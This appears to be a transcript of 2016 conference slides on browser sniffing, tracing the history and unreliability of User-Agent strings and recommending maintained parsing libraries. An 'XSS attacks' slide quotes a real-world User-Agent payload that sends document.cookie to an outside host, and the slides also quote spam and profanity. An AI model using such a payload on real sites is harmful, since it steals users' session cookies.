everybody lies NLHTML5 @ Nerds & Company, March 17th 2016

yes, this talk is about browser sniffing

why a talk about browser sniffing?

browser sniffing is dirty

you should use feature detection

why a talk about browser sniffing?

what is browser sniffing?

The HTTP specification defines the User-Agent header. It contains a string with information about the browser.

Every request the browser makes to the server includes the User-Agent header

GET http://whichbrowser.net/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: whichbrowser.net

GET http://whichbrowser.net/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: whichbrowser.net HTTP/1.1 200 OK Date: Mon, 08 Feb 2016 10:40:28 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT ETag: "984-50cae11796432" Accept-Ranges: bytes Content-Length: 2436 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 <!doctype html> <html>

You can access the exact same string using JavaScript

<script type=“text/javascript"> <!-alert(navigator.userAgent); //--> </script>

You can use the User-Agent string to identify: the browser the rendering engine the operating system the device model and more

why browser sniffing is hard

things started out simple

Mosaic Mosaic/1.0 (Win3.1) The name of the browser The version of the browser Operating system

Netscape Navigator Mozilla/1.0 (Win3.1) The code name of the browser The version of the browser Operating system

but it quickly started to get complicated

Internet Explorer Mozilla/1.0 (compatible; MSIE 1.0; Windows 95) The name of the browser Compatible with Netscape Navigator 1.0 The version of the browser Operating system

Opera Opera/8.54 (Windows 95; U; en) The name of the browser The version of the browser Operating system English language United States level encryption

Opera Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0 The name of the browser The version of the browser Rendering engine

Opera Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.10 The name of the browser Fake version of the browser Real version of the browser

Firefox Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.0.12) Gecko/20090706 Firefox/3.0.12 The name of the rendering engine The name of the browser Build date of the rendering engine Version of the browser Version of the rendering engine

Firefox Mozilla/5.0 (Windows NT 6.0; rv:15.0) Gecko/20100101 Firefox/15.0 Build date is no longer updated

Firefox Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0

and it gets worse…

Safari Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3 The name of the browser Version of the browser

Chrome Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/525.28.3 The name of the browser Version of the browser

Opera Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180 The name of the browser Version of the browser

Internet Explorer Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Version of the browser

Edge Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162 The name of the browser Version of the browser

and those were all relatively normal User-Agent strings

“User-Agent strings only get larger over time, never smaller” Niels’s second law of User-Agent strings

Samsung Internet Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/ 28.0.1500.94 Mobile Safari/537.36 Samsung device Version of the browser

Nokia Xpress for Windows Phone Mozilla/5.0 (Series40; NOKIALumia800; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.8.0.50.5

LG Netcast Mozilla/5.0 (X11; Linux; ko-KR) AppleWebKit/534.26+ (KHTML, like Gecko) Version/5.0 Safari/534.26+

Sometimes browsers include a compatibility mode, or desktop mode which deliberately changes the User-Agent string

Opera Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 The name of the browser The name of the operating system Version of the browser

Opera Mobile (desktop mode) Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 The name of the browser ROT 13 encrypted “mobi“ Version of the browser

Internet Explorer Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) Browser version

Internet Explorer (compatibility view) Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) Trident 5 means it’s Internet Explorer 9

And it is possible to change the User-Agent string yourself

spam http://www.sexxlife.it/sexyshop (sexy shop - sexy toys, BDSM, vibratori, falli, vagine, lubrificanti, dvd porno, film hard, lingerie - Migliaia di articoli nel nostro sexy shop online.; http://www.sexxlife.it; info@sexxlife.it)

XSS attacks

<script>alert("My Little Pony”);</script> <script language="JavaScript">document.location= "http://www.max1094.18.lc/admin/cookies.php?c=" + document.cookie;</script> <img src="http://bravo.trollab.org/mylittlepony.png" alt="My Little Pony”>

XSS attacks

funny people Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit) Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Surface Zune Phone XL) AppleWebKit/537.36 (KHTML, like Gecko) ( °□°

angry people

angry people FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) FuckYou/123.0 FuckingFox/321.0 Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) Presto/2.10.229 Version/11.62 Seriously, Go fuck yourself W3C standards are important. Stop fucking obsessing over user-agent already.

4 x balls 82 x fuck 9 x dick 1.000.000 unique useragent strings 6 x ass 10 x shit 3 x vagina 108 x sex

User-Agent strings cannot be trusted!

Everybody lies

you should never use browser sniffing for controlling access to your website

you should never use browser sniffing for determining browser capabilities

you should never build your own browser sniffing library

what is browser sniffing good for?

improve ux if you know the platform or browser, you can streamline the user experience

analytics if you know your users, you can build a better site for them

error logging if you know which browser is causing problems, you can fix them

Use a browser sniffing library that is regularly updated. And check if it is possible to automatically schedule updates.

Try libraries like UAParser, PiwikDeviceDetector or WhichBrowser https://github.com/ua-parser https://github.com/piwik/device-detector https://github.com/whichbrowser

Please don’t use WURLF because it is outdated and just not good

“If you tell a big enough lie and tell it frequently enough, it will be believed” — Ghandi

“If you tell a big enough lie and tell it frequently enough, it will be believed” — Ghandi

“If you tell a big enough lie and tell it frequently enough, it will be believed” — Adolf Hitler

Thank you!

Thank you!